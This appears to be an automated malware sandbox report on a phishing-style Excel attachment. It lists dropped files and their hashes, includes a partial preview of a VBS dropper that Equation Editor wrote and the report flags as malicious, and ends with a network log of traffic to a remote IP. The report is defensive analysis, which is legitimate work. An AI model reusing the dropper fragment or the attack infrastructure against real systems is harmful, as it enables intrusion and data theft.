File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\F0B5.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\brjdi3nn.p5i.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\eadvw4jj.1zw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\jt425jzm.yv4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\k1albv2k.agm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\k4b1llsj.uv2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DFD41FACE3FBBCF23F.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	2940928
Entropy (8bit):	5.991049298223182
Encrypted:	false
SSDEEP:	49152:tke0SStM3kFVoCod4DZlvpSJWvzACj78LkPR1:
MD5:	53218BC75EC82E2A03F4B354DDCBBEA9
SHA1:	D98A15D0D1F05F10D641AE7455F52433E4F62A26
SHA-256:	8F7C5D0BF86B57E3F643A13ACF7006B710BEF958A2B23F20C21E0D880178C574
SHA-512:	B9C5249F682A02336B1E269B3B599C1DB6CC98EA67A6C1DF5D2255DDB8626E8D6EDA7209A38311B83D2251883EC409F38FB93711CC10C9B6C30D73D3648D3AEF
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\prnport.vbs

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Category:	dropped
Size (bytes):	114106
Entropy (8bit):	3.7167517865088318
Encrypted:	false
SSDEEP:	1536:jOwLNU1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqGb5uJZUU0tKl9CP8Z:jdNU1DHFUGmgURDFBe0tKl9CP4
MD5:	7BCEAB89E17A21D13720A0B9F0477184
SHA1:	4F319FFBFAEFA545C663959E03879B338D85E99E
SHA-256:	40BDA6D4FE2BC514FBAC94B03A44F18A4984496BC2218C27F1A5880E28913B04
SHA-512:	54363E5A6C1DD77E8C147F88794CC0EA1419639214E4AD6D1830A6C129E9114A2F5449E25BEFE6E83AB30CDDD27A1DEC2DFA7ED5092E228F2C8B96ABE25C58BE
Malicious:	true
Preview:	......'.....c.o.n.s.t. .c.o.b.r.a.n.c.i.s.t.a. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .p.e.d.e.r.n.a.l. . . . . . .=. .3.....c.o.n.s.t. .e.s.p.e.r.t.a.m.e.n.t.e. . . . . . . . . . .=. .4.....c.o.n.s.t. .m.a.t.a.d.o.i.r.o. . . . . . . . . . .=. .5.........c.o.n.s.t. .a.l.l.a.m.a.n.d.a. . . . . . . .=. .0.....c.o.n.s.t. .K.E.r.r.o.r.F.a.i.l.u.r.e. . . . . . . .=. .1.........c.o.n.s.t. .k.F.l.a.g.C.r.e.a.t.e.O.r.U.p.d.a.t.e. .=. .0.........c.o.n.s.t. .m.o.d.e.r.n.a.d.a.m.e.n.t.e. . . . . . . . . . .=. .".r.o.o.t.\.c.i.m.v.2.".............'.....'. .C.o.n.s.t.a.n.t.s. .f.o.r. .t.h.e. .p.a.r.a.m.e.t.e.r. .d.i.c.t.i.o.n.a.r.y.....'.....c.o.n.s.t. .f.e.r.n.a.n.d.i.n.a. . . . . . .=. .1.....c.o.n.s.t. .f.a.g.u.e.i.r.o. . . . . . . . .=. .2.....c.o.n.s.t. .k.D.o.u.b.l.e.S.p.o.o.l. . . . . .=. .3.....c.o.n.s.t. .k.P.o.r.t.N.u.m.b.e.r. . . . . . .=. .4.....c.o.n.s.t. .k.P.o.

C:\Users\user\Desktop\~$xF3wienia PO2102559-1.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.9979469624052815
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	xF3wienia PO2102559-1.xlsx
File size:	2'146'106 bytes
MD5:	06fd382c8c40f2ce72e90514cda560cc
SHA1:	1dc8dbd9622345985343345b938bd97004621e56
SHA256:	5c235e5cae22c77b759b197a0758357bdb7a2a6c92c0edf829132c50108c668a
SHA512:	d222a1e94291bcc1eb34227288b62a652a68c2c1ec62bb6e98ebfd6d0b85cd220f0e386339764e98304c45a6574c1fb6e7be93f503459652c938f8b3f983c79c
SSDEEP:	49152:wyV017Dlllv83kuvid87zei/JqYq5+QSzTYYjvBPby2:wy29DljM1NU35+QSzdBH
TLSH:	9BA5338787C1A8CC37C1C4D723482EF94161FC65706FA220B9E84179AD0E9EE9ED7B95
File Content Preview:	PK.........K.Xl...}...X.......[Content_Types].xmlUT...2.'f2.'f2.'f..MO.0...H...i.....n.....$..c..[X.D....q;.....K..~..qRwz..&..h..D;m..\..q.L....."ARN+..db.(z....h...V;...(.K...J....8R.X..8.A.35.y.j...;.GM.<D...B.-%.+...$.E.<l.+V&T....8..N..4..)+......N

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "xF3wienia PO2102559-1.xlsx"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Author:	Mac
Last Saved By:	Mac
Create Time:	2024-04-18T14:58:31Z
Last Saved Time:	2024-04-18T14:59:24Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams

Stream Path: \x1oLE10nATIVE, File Type: data, Stream Size: 2923576

General
Stream Path:	\x1oLE10nATIVE
CLSID:
File Type:	data
Stream Size:	2923576
Entropy:	5.9745100756676095
Base64 Encoded:	False
Data ASCII:	4 , . . ~ . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) D . . . . - . . . . Z . . . k u . v . / o . X . P . 7 C 3 , y . U J \| . ? o . . / Q . . H . E . d 2 ; n . . . . . } + . ! . " v . h s f d + f Q + . ' u & . m . . . 9 . . Q . 4 2 m 9 n x . . . & ) ( ~ . X U X X P b ( h . D . . N m / T % % ` # Z & R \| . . a b . . h T . # . . w 7 . q 8 \\ . . h m l e . . _ . a . - E . . M d , - / q . K . . a . l f N h 2 . . . . e r W _ . .
Data Raw:	34 9c 2c 00 03 7e 01 eb 47 0a 01 05 e3 e7 ae ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e9 2d 01 00 00 00 5a a1 e4 9e f9 a3 96 1e 0b 12 a5 b7 e0 6b ba 75 88 19 e1 76 18 be ca 2f ed 6f 0a a6 e5 f7 58 b7 a1 0f d1 50 c7 ac 37 b7 43 33

Stream Path: oPtxub9, File Type: empty, Stream Size: 0

General
Stream Path:	oPtxub9
CLSID:
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 07:32:37.219444036 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.513297081 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.513401031 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.513717890 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808244944 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808346987 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808480978 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808540106 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808557987 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808598042 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808610916 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808649063 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808671951 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808727980 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808763027 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808820963 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808835030 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808890104 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.808938026 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808976889 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.808994055 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.809031010 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:37.809041023 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.809084892 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:37.811876059 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102127075 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102199078 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102205992 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102247953 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102298975 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102322102 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102369070 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102370024 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102374077 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102423906 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102437019 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102469921 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102482080 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102504015 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102514029 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102547884 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102581978 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102629900 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102655888 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102657080 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102674007 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102679014 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102696896 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102722883 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102731943 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102756977 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102775097 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102792978 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102807999 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102824926 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102854967 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102874041 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102893114 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102910042 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.102937937 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102937937 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102963924 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.102984905 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.103020906 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.103030920 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.103075027 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396291018 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396344900 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396406889 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396441936 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396441936 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396441936 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396460056 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396514893 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396595001 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396617889 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396617889 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396655083 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396673918 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396761894 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396838903 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396843910 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396933079 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.396943092 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.396987915 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397003889 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397048950 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397078991 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397082090 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397131920 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397144079 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397187948 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397238016 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397289991 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397314072 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397358894 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397376060 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397435904 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397442102 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397485971 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397519112 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397564888 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397653103 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397703886 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397708893 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397742033 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397756100 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397784948 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397797108 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397852898 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397882938 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397928953 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.397948980 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397991896 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.397994995 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398034096 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398036957 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398083925 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398109913 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398165941 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398165941 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398212910 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398217916 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398266077 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398293018 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398338079 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398363113 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398395061 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398412943 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398441076 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398490906 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398540020 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398551941 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398583889 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398627043 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398665905 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398680925 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398701906 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398709059 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398756027 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398804903 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398855925 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398890018 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.398942947 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.398967028 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.399017096 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690231085 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690260887 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690329075 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690382004 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690414906 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690414906 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690414906 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690457106 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690474987 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690500975 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690500975 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690510988 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690521002 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690574884 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690574884 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690618038 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690623045 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690655947 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690674067 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690716982 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690752029 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690783978 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690804958 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690808058 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690825939 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690850019 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690865993 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690871954 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690917015 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.690917969 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.690964937 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.691003084 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.691020012 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.691049099 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.691081047 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.691087961 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.691138029 CEST	49163	80	192.168.2.22	5.182.211.151
